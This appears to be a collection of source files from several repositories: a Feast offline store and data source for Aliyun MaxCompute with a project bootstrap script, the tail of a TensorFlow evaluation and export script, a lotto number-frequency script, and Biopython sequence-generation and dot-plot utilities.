'enable_quantize': False,
'online_quantize': False,
'enable_at': False,
'w_at': 2.,
})
# create input_fn
def input_fn_eval():
return input_fn(
is_training=False,
data_dir=args.data_dir,
batch_size=_BATCH_SIZE,
num_epochs=1,
dtype=tf.float32,
oss_load=args.oss_load
)
eval_hooks = None
if args.enable_quantize:
quant_eval_hook = QuantHook(bits=args.q_bits)
eval_hooks = [quant_eval_hook]
# evaluation
eval_results = classifier.evaluate(input_fn=input_fn_eval,
steps=None,
hooks=eval_hooks)
logging.info(eval_results)
# save the model
logging.info('Export the saved model!')
input_receiver_fn = export.build_tensor_serving_input_receiver_fn(
shape, batch_size=None, dtype=tf.float32)
classifier.export_saved_model(args.export_dir, input_receiver_fn)
logging.info('Finished export!')
``` |
{
"source": "777ki/feast",
"score": 2
} |
#### File: infra/offline_stores/maxcompute.py
```python
import uuid
from datetime import date, datetime, timedelta
from typing import Dict, List, Optional, Union
import numpy as np
import pandas as pd
import pyarrow
from pydantic import StrictStr
from pydantic.typing import Literal
from tenacity import Retrying, retry_if_exception_type, stop_after_delay, wait_fixed
from feast.data_source import DataSource
from feast.errors import (
FeastProviderLoginError,
InvalidEntityType,
MaxcomputeJobCancelled,
MaxcomputeJobStillRunning,
MaxcomputeQueryError,
MaxcomputeUploadError,
)
from feast.feature_view import FeatureView
from feast.infra.offline_stores import offline_utils
from feast.infra.offline_stores.offline_store import OfflineStore, RetrievalJob
from feast.infra.utils import aliyun_utils
from feast.on_demand_feature_view import OnDemandFeatureView
from feast.registry import Registry
from feast.repo_config import FeastConfigBaseModel, RepoConfig
from .maxcompute_source import MaxcomputeSource
try:
import odps
from odps import ODPS, options
options.sql.use_odps2_extension = True
options.tunnel.use_instance_tunnel = True
options.tunnel.limit_instance_tunnel = False
except ImportError as e:
from feast.errors import FeastExtrasDependencyImportError
raise FeastExtrasDependencyImportError("aliyun", str(e))
class MaxcomputeOfflineStoreConfig(FeastConfigBaseModel):
""" Offline store config for Aliyun Maxcompute """
type: Literal["maxcompute"] = "maxcompute"
""" Offline store type selector"""
region: Optional[StrictStr] = None
""" (optional)Macompute region name"""
project: StrictStr
""" Maxcompute project name"""
access_key: StrictStr
""" Maxcompute access key"""
secret_access_key: StrictStr
""" Maxcompute secret access key"""
end_point: Optional[StrictStr] = None
""" (optional)Maxcompute endpoint"""
class MaxcomputeOfflineStore(OfflineStore):
@staticmethod
def pull_latest_from_table_or_query(
config: RepoConfig,
data_source: DataSource,
join_key_columns: List[str],
feature_name_columns: List[str],
event_timestamp_column: str,
created_timestamp_column: Optional[str],
start_date: datetime,
end_date: datetime,
) -> RetrievalJob:
assert isinstance(data_source, MaxcomputeSource)
from_expression = data_source.get_table_query_string()
partition_by_join_key_string = ", ".join(join_key_columns)
if partition_by_join_key_string != "":
partition_by_join_key_string = (
"PARTITION BY " + partition_by_join_key_string
)
timestamps = [event_timestamp_column]
if created_timestamp_column:
timestamps.append(created_timestamp_column)
timestamp_desc_string = " DESC, ".join(timestamps) + " DESC"
field_string = ", ".join(join_key_columns + feature_name_columns + timestamps)
# client = aliyun_utils.get_maxcompute_client(project=config.offline_store.project)
client = aliyun_utils.get_maxcompute_client(
ak=config.offline_store.access_key,
sk=config.offline_store.secret_access_key,
project=config.offline_store.project,
region=config.offline_store.region,
endpoint=config.offline_store.end_point,
)
query = f"""
SELECT {field_string}
FROM (
SELECT {field_string},
ROW_NUMBER() OVER({partition_by_join_key_string} ORDER BY {timestamp_desc_string}) AS _feast_row
FROM {from_expression}
WHERE cast({event_timestamp_column} as TIMESTAMP) BETWEEN TIMESTAMP('{start_date}') AND TIMESTAMP('{end_date}')
)
WHERE _feast_row = 1
"""
# When materializing a single feature view, we don't need full feature names. On demand transforms aren't materialized
return MaxcomputeRetrievalJob(
query=query,
client=client,
config=config,
full_feature_names=False,
on_demand_feature_views=None,
)
@staticmethod
def get_historical_features(
config: RepoConfig,
feature_views: List[FeatureView],
feature_refs: List[str],
entity_df: Union[pd.DataFrame, odps.df.DataFrame, str],
registry: Registry,
project: str,
full_feature_names: bool = False,
) -> RetrievalJob:
# TODO: Add entity_df validation in order to fail before interacting with Maxcompute
assert isinstance(config.offline_store, MaxcomputeOfflineStoreConfig)
client = aliyun_utils.get_maxcompute_client(
ak=config.offline_store.access_key,
sk=config.offline_store.secret_access_key,
project=config.offline_store.project,
region=config.offline_store.region,
endpoint=config.offline_store.end_point,
)
assert isinstance(config.offline_store, MaxcomputeOfflineStoreConfig)
# local pandas data frame need upload
if isinstance(entity_df, str):
table_reference = entity_df
else:
table_reference = _get_table_reference_for_new_entity(
client, config.offline_store.project
)
entity_schema = _upload_entity_df_and_get_entity_schema(
client=client, table_name=table_reference, entity_df=entity_df
)
entity_df_event_timestamp_col = offline_utils.infer_event_timestamp_from_entity_df(
entity_schema
)
expected_join_keys = offline_utils.get_expected_join_keys(
project, feature_views, registry
)
offline_utils.assert_expected_columns_in_entity_df(
entity_schema, expected_join_keys, entity_df_event_timestamp_col
)
# Build a query context containing all information required to template the Maxcompute SQL query
query_context = offline_utils.get_feature_view_query_context(
feature_refs, feature_views, registry, project
)
# Generate the Maxcompute SQL query from the query context
query = offline_utils.build_point_in_time_query(
query_context,
left_table_query_string=table_reference,
entity_df_event_timestamp_col=entity_df_event_timestamp_col,
query_template=MULTIPLE_FEATURE_VIEW_POINT_IN_TIME_JOIN,
full_feature_names=full_feature_names,
)
return MaxcomputeRetrievalJob(
query=query,
client=client,
config=config,
full_feature_names=full_feature_names,
on_demand_feature_views=registry.list_on_demand_feature_views(
project, allow_cache=True
),
)
class MaxcomputeRetrievalJob(RetrievalJob):
def __init__(
self,
query: str,
client: ODPS,
config: RepoConfig,
full_feature_names: bool,
on_demand_feature_views: Optional[List[OnDemandFeatureView]],
):
self.query = query
self.client = client
self.config = config
self._full_feature_names = full_feature_names
self._on_demand_feature_views = on_demand_feature_views
@property
def full_feature_names(self) -> bool:
return self._full_feature_names
@property
def on_demand_feature_views(self) -> Optional[List[OnDemandFeatureView]]:
return self._on_demand_feature_views
def to_df_internal(self) -> pd.DataFrame:
# TODO: Ideally only start this job when the user runs "get_historical_features", not when they run to_df()
df = self._to_df()
return df
def to_sql(self) -> str:
"""
Returns the SQL query that will be executed in Maxcompute to build the historical feature table.
"""
return self.query
    def to_maxcompute(self, table_name: str, overwrite: bool = True) -> None:
"""
Triggers the execution of a historical feature retrieval query and exports the results to a Maxcompute table.
Args:
table_name: specify name of destination table
"""
if overwrite:
sql = f"DROP TABLE IF EXISTS {table_name}"
job = self.client.run_sql(sql)
print("logview url:", job.get_logview_address())
query = self.query
sql = f"CREATE TABLE {table_name} LIFECYCLE 1 AS {query}"
job = self.client.run_sql(sql)
print("logview url:", job.get_logview_address())
job.wait_for_success()
def _to_df(self) -> pd.DataFrame:
table_reference = _get_table_reference_for_new_entity(
self.client, self.config.offline_store.project
)
query = self.query
sql = f"CREATE TABLE {table_reference} LIFECYCLE 1 AS {query}"
job = self.client.run_sql(sql)
print("logview url:", job.get_logview_address())
job.wait_for_success()
table = odps.df.DataFrame(self.client.get_table(table_reference))
return table.to_pandas()
def to_arrow(self) -> pyarrow.Table:
df = self._to_df()
return pyarrow.Table.from_pandas(df)
def _get_table_reference_for_new_entity(client: ODPS, dataset_project: str) -> str:
"""Gets the table_id for the new entity to be uploaded."""
table_name = offline_utils.get_temp_entity_table_name()
return f"{dataset_project}.{table_name}"
def _upload_entity_df_and_get_entity_schema(
client: ODPS,
table_name: str,
entity_df: Union[pd.DataFrame, odps.df.DataFrame, str],
) -> Dict[str, np.dtype]:
"""Uploads a Pandas entity dataframe into a Maxcompute table and returns the resulting table"""
if type(entity_df) is str:
limited_entity_df = (
odps.df.DataFrame(client.get_table(table_name)).limit(1).execute()
)
entity_schema = dict(
zip(limited_entity_df.schema.names, limited_entity_df.schema.types)
)
elif isinstance(entity_df, pd.DataFrame):
# Drop the index so that we dont have unnecessary columns
entity_df.reset_index(drop=True, inplace=True)
# Upload the dataframe into Maxcompute, creating a temporary table
upload_df = odps.df.DataFrame(entity_df)
try:
upload_df.persist(table_name, odps=client, lifecycle=1)
except Exception as e:
raise MaxcomputeUploadError(e)
entity_schema = dict(zip(upload_df.dtypes.names, upload_df.dtypes.types))
elif isinstance(entity_df, odps.df.DataFrame):
# Just return the Maxcompute schema
entity_schema = dict(zip(entity_df.dtypes.names, entity_df.dtypes.types))
else:
raise InvalidEntityType(type(entity_df))
return entity_schema
# TODO: Optimizations
# * Use GENERATE_UUID() instead of ROW_NUMBER(), or join on entity columns directly
# * Precompute ROW_NUMBER() so that it doesn't have to be recomputed for every query on entity_dataframe
# * Create temporary tables instead of keeping all tables in memory
# Note: Keep this in sync with sdk/python/feast/infra/offline_stores/redshift.py:MULTIPLE_FEATURE_VIEW_POINT_IN_TIME_JOIN
MULTIPLE_FEATURE_VIEW_POINT_IN_TIME_JOIN = """
--Compute a deterministic hash for the `left_table_query_string` that will be used throughout
--all the logic as the field to GROUP BY the data
WITH entity_dataframe AS (
SELECT *,
CAST({{entity_df_event_timestamp_col}} AS TIMESTAMP) AS entity_timestamp
{% for featureview in featureviews %}
,CONCAT(
{% for entity in featureview.entities %}
CAST({{entity}} AS STRING),
{% endfor %}
CAST({{entity_df_event_timestamp_col}} AS STRING)
) AS {{featureview.name}}__entity_row_unique_id
{% endfor %}
FROM {{ left_table_query_string }}
),
{% for featureview in featureviews %}
{{ featureview.name }}__entity_dataframe AS (
SELECT
{{ featureview.entities | join(', ')}},
cast(entity_timestamp as TIMESTAMP),
{{featureview.name}}__entity_row_unique_id
FROM entity_dataframe
GROUP BY {{ featureview.entities | join(', ')}}, entity_timestamp, {{featureview.name}}__entity_row_unique_id
),
-- This query template performs the point-in-time correctness join for a single feature set table
-- to the provided entity table.
--
-- 1. We first join the current feature_view to the entity dataframe that has been passed.
-- This JOIN has the following logic:
-- - For each row of the entity dataframe, only keep the rows where the `event_timestamp_column`
-- is less than the one provided in the entity dataframe
    -- - If there is a TTL for the current feature_view, also keep the rows where the `event_timestamp_column`
    -- is higher than the one provided minus the TTL
-- - For each row, Join on the entity key and retrieve the `entity_row_unique_id` that has been
-- computed previously
--
-- The output of this CTE will contain all the necessary information and already filtered out most
-- of the data that is not relevant.
{{ featureview.name }}__subquery AS (
SELECT
cast({{ featureview.event_timestamp_column }} as TIMESTAMP) as event_timestamp,
{{ featureview.created_timestamp_column ~ ' as created_timestamp,' if featureview.created_timestamp_column else '' }}
{{ featureview.entity_selections | join(', ')}},
{% for feature in featureview.features %}
{{ feature }} as {% if full_feature_names %}{{ featureview.name }}__{{feature}}{% else %}{{ feature }}{% endif %}{% if loop.last %}{% else %}, {% endif %}
{% endfor %}
FROM {{ featureview.table_subquery }}
WHERE cast({{ featureview.event_timestamp_column }} as TIMESTAMP) <= (SELECT MAX(entity_timestamp) FROM entity_dataframe)
{% if featureview.ttl == 0 %}{% else %}
AND cast({{ featureview.event_timestamp_column }} as TIMESTAMP) >= DATEADD((SELECT MIN(entity_timestamp) FROM entity_dataframe), -{{ featureview.ttl }}, "ss")
{% endif %}
),
{{ featureview.name }}__base AS (
SELECT
/*+ mapjoin({{ featureview.name }}__entity_dataframe)*/ subquery.*,
entity_dataframe.entity_timestamp,
entity_dataframe.{{featureview.name}}__entity_row_unique_id
FROM {{ featureview.name }}__subquery AS subquery
JOIN {{ featureview.name }}__entity_dataframe AS entity_dataframe
ON TRUE
AND subquery.event_timestamp <= entity_dataframe.entity_timestamp
{% if featureview.ttl == 0 %}{% else %}
AND subquery.event_timestamp >= DATEADD(entity_dataframe.entity_timestamp, -{{ featureview.ttl }}, "ss")
{% endif %}
{% for entity in featureview.entities %}
AND subquery.{{ entity }} = entity_dataframe.{{ entity }}
{% endfor %}
),
-- 2. If the `created_timestamp_column` has been set, we need to
-- deduplicate the data first. This is done by calculating the
-- `MAX(created_at_timestamp)` for each event_timestamp.
-- We then join the data on the next CTE
{% if featureview.created_timestamp_column %}
{{ featureview.name }}__dedup AS (
SELECT
{{featureview.name}}__entity_row_unique_id,
event_timestamp,
MAX(created_timestamp) as created_timestamp
FROM {{ featureview.name }}__base
GROUP BY {{featureview.name}}__entity_row_unique_id, event_timestamp
),
{% endif %}
-- 3. The data has been filtered during the first CTE "*__base"
-- Thus we only need to compute the latest timestamp of each feature.
{{ featureview.name }}__latest AS (
SELECT
{{featureview.name}}__entity_row_unique_id,
event_timestamp,
created_timestamp
FROM
(
SELECT *,
ROW_NUMBER() OVER(
PARTITION BY {{featureview.name}}__entity_row_unique_id
ORDER BY event_timestamp DESC{% if featureview.created_timestamp_column %},created_timestamp DESC{% endif %}
) AS row_number
FROM {{ featureview.name }}__base
{% if featureview.created_timestamp_column %}
JOIN {{ featureview.name }}__dedup
USING ({{featureview.name}}__entity_row_unique_id, event_timestamp, created_timestamp)
{% endif %}
)
WHERE row_number = 1
),
-- 4. Once we know the latest value of each feature for a given timestamp,
-- we can join again the data back to the original "base" dataset
{{ featureview.name }}__cleaned AS (
SELECT base.*,
{{featureview.name}}__entity_row_unique_id
FROM {{ featureview.name }}__base as base
JOIN {{ featureview.name }}__latest
USING(
{{featureview.name}}__entity_row_unique_id,
event_timestamp
{% if featureview.created_timestamp_column %}
,created_timestamp
{% endif %}
)
){% if loop.last %}{% else %}, {% endif %}
{% endfor %}
-- Joins the outputs of multiple time travel joins to a single table.
-- The entity_dataframe dataset being our source of truth here.
SELECT *
FROM entity_dataframe
{% for featureview in featureviews %}
LEFT JOIN (
SELECT
{{featureview.name}}__entity_row_unique_id
{% for feature in featureview.features %}
,{% if full_feature_names %}{{ featureview.name }}__{{feature}}{% else %}{{ feature }}{% endif %}
{% endfor %}
FROM {{ featureview.name }}__cleaned
) {{ featureview.name }}__u USING ({{featureview.name}}__entity_row_unique_id)
{% endfor %}
"""
```
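For orientation, a hypothetical retrieval sketch using the public Feast API with this offline store configured in `feature_store.yaml`; the feature references and the entity table name are illustrative:
```python
# Hypothetical sketch: point-in-time joined training data via the MaxCompute offline store.
from feast import FeatureStore

store = FeatureStore(repo_path=".")
job = store.get_historical_features(
    entity_df="my_project.feast_driver_entity_table",  # a table reference or a pandas DataFrame
    features=["driver_hourly_stats:conv_rate", "driver_hourly_stats:avg_daily_trips"],
)
training_df = job.to_df()  # runs the generated MaxCompute SQL and returns a pandas DataFrame
print(training_df.head())
```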
#### File: infra/offline_stores/maxcompute_source.py
```python
from typing import Callable, Dict, Iterable, Optional, Tuple
import odps
from feast import type_map
from feast.data_source import DataSource
from feast.errors import DataSourceNotFoundException
from feast.infra.utils import aliyun_utils
from feast.protos.feast.core.DataSource_pb2 import DataSource as DataSourceProto
from feast.repo_config import RepoConfig
from feast.value_type import ValueType
class MaxcomputeSource(DataSource):
def __init__(
self,
event_timestamp_column: Optional[str] = "",
table_ref: Optional[str] = None,
created_timestamp_column: Optional[str] = "",
field_mapping: Optional[Dict[str, str]] = None,
date_partition_column: Optional[str] = "",
query: Optional[str] = None,
):
self._maxcompute_options = MaxcomputeOptions(table_ref=table_ref, query=query)
super().__init__(
event_timestamp_column,
created_timestamp_column,
field_mapping,
date_partition_column,
)
def __eq__(self, other):
if not isinstance(other, MaxcomputeSource):
raise TypeError(
"Comparisons should only involve MaxcomputeSource class objects."
)
return (
self.maxcompute_options.table_ref == other.maxcompute_options.table_ref
and self.maxcompute_options.query == other.maxcompute_options.query
and self.event_timestamp_column == other.event_timestamp_column
and self.created_timestamp_column == other.created_timestamp_column
and self.field_mapping == other.field_mapping
)
@property
def table_ref(self):
return self._maxcompute_options.table_ref
@property
def query(self):
return self._maxcompute_options.query
@property
def maxcompute_options(self):
"""
Returns the maxcompute options of this data source
"""
return self._maxcompute_options
@maxcompute_options.setter
def maxcompute_options(self, maxcompute_options):
"""
Sets the maxcompute options of this data source
"""
self._maxcompute_options = maxcompute_options
@staticmethod
def from_proto(data_source: DataSourceProto):
assert data_source.HasField("maxcompute_options")
return MaxcomputeSource(
field_mapping=dict(data_source.field_mapping),
table_ref=data_source.maxcompute_options.table_ref,
event_timestamp_column=data_source.event_timestamp_column,
created_timestamp_column=data_source.created_timestamp_column,
date_partition_column=data_source.date_partition_column,
query=data_source.maxcompute_options.query,
)
def to_proto(self) -> DataSourceProto:
data_source_proto = DataSourceProto(
type=DataSourceProto.BATCH_BIGQUERY,
field_mapping=self.field_mapping,
maxcompute_options=self.maxcompute_options.to_proto(),
)
data_source_proto.event_timestamp_column = self.event_timestamp_column
data_source_proto.created_timestamp_column = self.created_timestamp_column
data_source_proto.date_partition_column = self.date_partition_column
return data_source_proto
def validate(self, config: RepoConfig):
        from odps.errors import NoSuchObject
if not self.query:
client = aliyun_utils.get_maxcompute_client(
ak=config.offline_store.access_key,
sk=config.offline_store.secret_access_key,
project=config.offline_store.project,
region=config.offline_store.region,
endpoint=config.offline_store.end_point,
)
try:
client.get_table(self.table_ref)
except NoSuchObject:
raise DataSourceNotFoundException(self.table_ref)
def get_table_query_string(self) -> str:
"""Returns a string that can directly be used to reference this table in SQL"""
if self.table_ref:
return f"`{self.table_ref}`"
else:
return f"({self.query})"
@staticmethod
def source_datatype_to_feast_value_type() -> Callable[[str], ValueType]:
return type_map.mc_to_feast_value_type
def get_table_column_names_and_types(
self, config: RepoConfig
) -> Iterable[Tuple[str, str]]:
client = aliyun_utils.get_maxcompute_client(
ak=config.offline_store.access_key,
sk=config.offline_store.secret_access_key,
project=config.offline_store.project,
region=config.offline_store.region,
endpoint=config.offline_store.end_point,
)
if self.table_ref is not None:
table_schema = client.get_table(self.table_ref).schema
if not isinstance(
table_schema[0], odps.models.table.TableSchema.TableColumn
):
raise TypeError("Could not parse Maxcompute table schema.")
            name_type_pairs = [(field.name, field.type) for field in table_schema]
else:
mc_columns_query = f"SELECT * FROM ({self.query}) LIMIT 1"
queryRes = client.execute_sql(mc_columns_query)
with queryRes.open_reader() as reader:
for row in reader:
name_type_pairs = [
(schema.name, schema.type) for schema in row._columns
]
break
return name_type_pairs
class MaxcomputeOptions:
"""
DataSource Maxcompute options used to source features from Aliyun Maxcompute query
"""
def __init__(self, table_ref: Optional[str], query: Optional[str]):
self._table_ref = table_ref
self._query = query
@property
def query(self):
"""
Returns the Maxcompute SQL query referenced by this source
"""
return self._query
@query.setter
def query(self, query):
"""
Sets the Maxcompute SQL query referenced by this source
"""
self._query = query
@property
def table_ref(self):
"""
        Returns the table ref of this Maxcompute table
"""
return self._table_ref
@table_ref.setter
def table_ref(self, table_ref):
"""
        Sets the table ref of this Maxcompute table
"""
self._table_ref = table_ref
@classmethod
def from_proto(cls, maxcompute_options_proto: DataSourceProto.MaxcomputeOptions):
"""
Creates a MaxcomputeOptions from a protobuf representation of a Maxcompute option
Args:
maxcompute_options_proto: A protobuf representation of a DataSource
Returns:
Returns a MaxcomputeOptions object based on the maxcompute_options protobuf
"""
maxcompute_options = cls(
table_ref=maxcompute_options_proto.table_ref,
query=maxcompute_options_proto.query,
)
return maxcompute_options
def to_proto(self) -> DataSourceProto.MaxcomputeOptions:
"""
Converts an MaxcomputeOptionsProto object to its protobuf representation.
Returns:
MaxcomputeOptionsProto protobuf
"""
maxcompute_options_proto = DataSourceProto.MaxcomputeOptions(
table_ref=self.table_ref, query=self.query
)
return maxcompute_options_proto
```
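A minimal, hypothetical sketch of declaring this source for a feature view; the table reference below is a placeholder:
```python
# Hypothetical sketch: a MaxCompute-backed batch source definition.
from feast.infra.offline_stores.maxcompute_source import MaxcomputeSource

driver_stats_source = MaxcomputeSource(
    table_ref="my_project.feast_driver_hourly_stats",
    event_timestamp_column="event_timestamp",
    created_timestamp_column="created",
)
```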
#### File: templates/aliyun/bootstrap.py
```python
import click
import odps
from feast.infra.utils import aliyun_utils
import pandas as pd
import time
def replace_str_in_file(file_path, match_str, sub_str):
with open(file_path, "r") as f:
contents = f.read()
contents = contents.replace(match_str, sub_str)
with open(file_path, "wt") as f:
f.write(contents)
def bootstrap():
# Bootstrap() will automatically be called from the init_repo() during `feast init`
import pathlib
from datetime import datetime, timedelta
from feast.driver_test_data import create_driver_hourly_stats_df
end_date = datetime.now().replace(microsecond=0, second=0, minute=0)
start_date = end_date - timedelta(days=15)
driver_entities = [1001, 1002, 1003, 1004, 1005]
driver_df = create_driver_hourly_stats_df(driver_entities, start_date, end_date)
ak = click.prompt("Aliyun access key")
sk = click.prompt("Aliyun sercet key")
p = click.prompt("Maxcompute project")
region = click.prompt("Maxcompute region")
endpoint = click.prompt("Maxcompute endpoint")
holo_host = click.prompt("Aliyun Hologres host")
holo_port = click.prompt("Aliyun Hologres port")
holo_db = click.prompt("Aliyun Hologres db")
    client = aliyun_utils.get_maxcompute_client(
ak=ak,
sk=sk,
project=p,
region=region,
endpoint=endpoint,
)
if click.confirm(
"Should I upload example data to Maxcompute (overwriting 'feast_driver_hourly_stats' table)?",
default=True,
):
upload_df = odps.df.DataFrame(driver_df)
upload_df.persist("feast_driver_hourly_stats", odps=client, lifecycle=1)
print("upload `feast_driver_hourly_stats` succ!")
if click.confirm(
"Should I upload entity data to Maxcompute (overwriting 'feast_driver_entity_table' table)?",
default=True,
):
entity_df = pd.DataFrame(
{
"event_timestamp": [
pd.Timestamp(dt, unit="ms", tz="UTC").round("ms")
for dt in pd.date_range(
start=datetime.now() - timedelta(days=2),
end=datetime.now(),
periods=2,
)
],
"driver_id": [1004, 1005],
}
)
upload_df = odps.df.DataFrame(entity_df)
upload_df.persist("feast_driver_entity_table", odps=client, lifecycle=1)
print("upload `feast_driver_entity_table` succ!")
repo_path = pathlib.Path(__file__).parent.absolute()
config_file = repo_path / "feature_store.yaml"
replace_str_in_file(config_file, "%ALIYUN_REGION%", region)
replace_str_in_file(config_file, "%ALIYUN_ACCESS_KEY%", ak)
replace_str_in_file(config_file, "%ALIYUN_SECRET_KEY%", sk)
replace_str_in_file(config_file, "%MAXCOMPUTE_PROJECT%", p)
replace_str_in_file(config_file, "%MAXCOMPUTE_ENDPOINT%", endpoint)
replace_str_in_file(config_file, "%HOLOGRES_HOST%", holo_host)
replace_str_in_file(config_file, "%HOLOGRES_PORT%", holo_port)
replace_str_in_file(config_file, "%HOLOGRES_DB%", holo_db)
if __name__ == "__main__":
bootstrap()
``` |
{
"source": "777moneymaker/python_course_extras",
"score": 4
} |
#### File: python_course_extras/lab8/lab8_extra.py
```python
from pathlib import Path
__author__ = '<NAME>'
def main():
file = Path(__file__).parent.joinpath('lotto_history.txt')
with open(file, 'r') as fh:
lines = [line.split(' ')[2].rstrip() for line in fh]
numbers = [int(num) for line in lines for num in line.split(',')]
f_count = lambda x: (x, numbers.count(x))
results = map(f_count, set(numbers))
print(*sorted(results, key=lambda x: -x[1])[:10], sep='\n')
if __name__ == '__main__':
main()
``` |
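The frequency count in `lab8_extra.py` can also be expressed with `collections.Counter`; a standalone sketch over made-up numbers:
```python
from collections import Counter

# Made-up drawn numbers standing in for the parsed lotto_history.txt contents.
numbers = [3, 7, 7, 15, 3, 7, 22, 15, 3, 41]

# most_common() yields (number, count) pairs sorted by frequency,
# equivalent to the map/sorted approach used above.
print(*Counter(numbers).most_common(10), sep='\n')
```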
{
"source": "777moneymaker/sjp_sequence",
"score": 2
} |
#### File: 777moneymaker/sjp_sequence/play.py
```python
import sys
import Plot
from Sequence import Sequence
__author__ = '<NAME>'
__license__ = "MIT"
__version__ = "1.0"
__status__ = "Production"
def main():
sq = Sequence(size=5000, seq_type='D')
sq.read_from_fasta('dr.fasta')
sq.blast_search()
Plot.plot_from_fasta('dr.fasta', 'dy.fasta', sys.argv[1])
if __name__ == '__main__':
main()
```
#### File: 777moneymaker/sjp_sequence/Plot.py
```python
import sys
from Bio import SeqIO
from Bio.Blast import NCBIXML
from matplotlib import pylab
def plot_from_xml(fn1=None, fnx=None, window=7):
"""Makes a dot-plot from xml and fasta sequence.
:param fn1: Fasta file.
:param fnx: XML file.
    :param window: Threshold, for example (5)
:return: None
"""
if fn1 is not None and fnx is not None:
with open(fn1, 'r') as fh, open(fnx, 'r') as fx:
window = int(window)
file1 = NCBIXML.read(fh)
filex = NCBIXML.read(fx)
seq_one = str(file1.seq).upper()
seq_two = str(filex.seq).upper()
            data = [[(seq_one[i:i + window] != seq_two[j:j + window]) for j in range(len(seq_one) - window)] for i
in range(len(seq_two) - window)]
pylab.gray()
pylab.imshow(data)
pylab.xlabel(
'{} (length {} bp)'.format(file1.seq, len(file1.seq)))
pylab.ylabel(
'{} (length {} bp)'.format(filex.seq, len(filex.seq)))
pylab.title('Dot plot using window size {}\n(allowing no mis-matches)'.format(window))
pylab.show()
def plot_from_fasta(fn1=None, fn2=None, window=7):
    """Makes a dot-plot from two fasta files.
:param fn1: Fasta file.
:param fn2: Fasta file.
:param window: Threshold, for example (5)
:return: None
"""
if fn1 is not None and fn2 is not None:
with open(fn1, 'r') as fh1, open(fn2, 'r') as fh2:
window = int(window)
file1 = SeqIO.read(fh1, format='fasta')
file2 = SeqIO.read(fh2, format='fasta')
dict_one = {}
dict_two = {}
for (seq, section_dict) in [(str(file1.seq).upper(), dict_one),
(str(file2.seq).upper(), dict_two)]:
for i in range(len(seq) - window):
section = seq[i:i + window]
try:
section_dict[section].append(i)
except KeyError:
section_dict[section] = [i]
matches = set(dict_one).intersection(dict_two)
print('{} unique matches'.format(len(matches)))
x, y = [], []
for section in matches:
for i in dict_one[section]:
for j in dict_two[section]:
x.append(i)
y.append(j)
pylab.cla()
pylab.gray()
pylab.scatter(x, y)
pylab.xlim(0, len(file1) - window)
pylab.ylim(0, len(file2) - window)
pylab.xlabel('{} (length {} bp)'.format(file1.id, len(file1.seq)))
pylab.ylabel('{} (length {} bp)'.format(file2.id, len(file2.seq)))
pylab.title('Dot plot using window size {}\n(allowing no mis-matches)'.format(window))
pylab.show()
if __name__ == '__main__':
if sys.argv[4] == 'xml':
plot_from_xml(sys.argv[1], sys.argv[2], sys.argv[3])
elif sys.argv[4] == 'fasta':
plot_from_fasta(sys.argv[1], sys.argv[2], sys.argv[3])
else:
pass
```
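The windowed-dictionary matching used in `plot_from_fasta` can be exercised on toy strings without Biopython or matplotlib; a standalone sketch:
```python
# Toy illustration of the window/dictionary matching from plot_from_fasta (no plotting).
seq_a = "ACGTACGTGG"
seq_b = "TTACGTACGT"
window = 4

dict_a, dict_b = {}, {}
for seq, section_dict in [(seq_a, dict_a), (seq_b, dict_b)]:
    for i in range(len(seq) - window):
        section_dict.setdefault(seq[i:i + window], []).append(i)

matches = set(dict_a).intersection(dict_b)
print('{} unique matches'.format(len(matches)))
for section in sorted(matches):
    print(section, dict_a[section], dict_b[section])  # positions in seq_a and seq_b
```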
#### File: 777moneymaker/sjp_sequence/Sequence.py
```python
import os
import random
from string import ascii_uppercase, digits
from Bio import Seq, SeqUtils, SeqIO, SeqRecord
from Bio.Alphabet import IUPAC
from Bio.Blast import NCBIWWW, NCBIXML
from matplotlib import pylab
__author__ = '<NAME>'
__license__ = "MIT"
__version__ = "1.0"
__status__ = "Production"
class Sequence:
dna_bases = IUPAC.IUPACUnambiguousDNA.letters
rna_bases = IUPAC.IUPACUnambiguousRNA.letters
amino_acids = IUPAC.IUPACProtein.letters
def __init__(self, size: int = 100, seq_type: str = 'D', id: str = None, seq=None):
"""Creates random Sequence of given size and type.
:param size: Size of sequence.
:param seq_type: Sequence type, D = DNA, R = RNA, P = Protein.
:param id: ID of sequence.
:param seq: Ready Sequence object.
"""
self.s_type = {'D': 'DNA', 'R': 'RNA', 'P': 'PROTEIN'}[str(seq_type)]
# If size is not multiple of 3, then make it bigger
self.size = size if not size % 3 else size + (3 - size % 3)
        # Use the provided sequence if given, otherwise generate a random one
self.seq = seq if seq else self.generate_sequence()
self.id = id if id else ''.join(random.choice(ascii_uppercase) for i in range(2)) + '_' \
+ ''.join(random.choice(digits) for i in range(random.randint(4, 7)))
self.record = SeqRecord.SeqRecord(self.seq, id=self.id)
def show(self):
"""Prints sequence of object and it's ID.
:return: None
"""
print('Sequence: {}\nID: {}'.format(self.seq, self.id))
def generate_sequence(self):
"""Generates random sequence based on type.
:return: Bio.Seq object.
"""
if self.s_type not in {'DNA', 'RNA', 'PROTEIN'}:
raise TypeError('Wrong type of sequence')
else:
if self.s_type == 'DNA':
seq = Seq.Seq(''.join(random.choice(Sequence.dna_bases) for i in range(self.size)))
elif self.s_type == 'RNA':
seq = Seq.Seq(''.join(random.choice(Sequence.rna_bases) for i in range(self.size)))
else:
seq = Seq.Seq(''.join(random.choice(Sequence.amino_acids) for i in range(self.size)))
return seq
def calculate_gc(self):
"""Calculates the GC percent in sequence.
:return: Float number - GC percent.
"""
if self.s_type == 'PROTEIN':
raise TypeError('GC are not in {} sequence'.format(self.s_type))
return SeqUtils.GC(self.seq)
def transcribe(self):
"""Transcribes to RNA sequence if sequence is type D (DNA).
:return: Seq object of type RNA.
"""
if self.s_type != 'DNA':
raise TypeError('Sequence type {} can not be transcribed.'.format(self.s_type))
return Seq.Seq.transcribe(self.seq)
def translate(self):
"""Translates to Protein sequence if sequence type is R (RNA).
:return: Seq object of type Protein.
"""
if self.s_type != 'RNA':
raise TypeError('Sequence type {} can not be translated.'.format(self.s_type))
return Seq.Seq.translate(self.seq)
def reversed_transcription(self):
"""Given the seq of type RNA transcribes it to DNA.
:return: Seq object of type DNA.
"""
if self.s_type != 'RNA':
raise TypeError('Sequence type {} can not be transcribed in reverse.'.format(self.s_type))
return Seq.back_transcribe(self.seq)
    def get_complement(self):
        """Return the reverse complement of the sequence.
        :return: Reverse complement Seq object.
"""
return Seq.reverse_complement(self.seq)
def get_sequence_elems(self):
"""Creates iterator of all bases in sequence.
:return: Sequence iterator.
"""
for base in self.seq:
yield base
def get_complement_elems(self):
"""Gives the complement strand of sequence.
:return: Complement Seq iterator.
"""
for base in Seq.reverse_complement(self.seq):
yield base
